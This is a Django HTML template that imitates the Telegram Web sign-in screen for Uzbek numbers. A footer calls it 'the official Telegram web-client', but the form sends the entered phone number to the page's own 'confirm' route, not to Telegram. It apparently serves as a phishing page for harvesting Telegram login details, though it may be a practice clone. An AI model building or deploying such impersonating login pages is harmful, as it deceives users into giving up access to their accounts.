{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <link rel="stylesheet" href="{% static 'style.css' %}">

</head>
<body>
    <div class="navbar">
        <div class="navbar-brand ">
            <img src="" alt="">
        </div>
        <div class="title"></div>
        <button id="myBtn">Next <span></span></button>
        <!-- The Modal -->
        <div id="myModal" class="modal">
            <!-- Modal content -->
            <div class="modal-content">
                <div class="modal-text">
                    Is this phone number correct?
                    <div class="modal-number" id="modal-phone">+998 </div>
                </div>
                <div class="modal-footer">
                    <button class="close">CANCEL</button>
                    <form action="{% url 'confirm' %}" method="POST" class="modal-form">
                        {% csrf_token %}
                        <input type="text" name="phone" class="hidden-phone">
                        <button class="ok">OK</button>
                    </form>
                   
                </div>
            </div>
        </div>
    </div>
    <div class="container">
        <div class="content">
            <p class="p0">Sign in</p>

            <p class="p1">Please enter your full phone number.
                <br>
                <br>
                Note that you need an existing account to log in to Telegram Web. To sign up for Telegram, use one of our mobile apps .
            </p>
            <p class="country">
                Country
            </p>
            <p class="country_title">
                Uzekistan
            </p>
            <p class="country">
                Code
            </p>
            <div class="div">
                <input class="country_title2" readonly value="+998">
                <input id="phone" class="country_title3" placeholder="Phone number">  
            </div>
        </div>  
    </div>
    <p class="footer">Welcome to the official Telegram web-client.</p>
    <script src="{% static 'script.js' %}"></script>
    <script src="https://kit.fontawesome.com/92d93db707.js" crossorigin="anonymous"></script>
</body>
</html>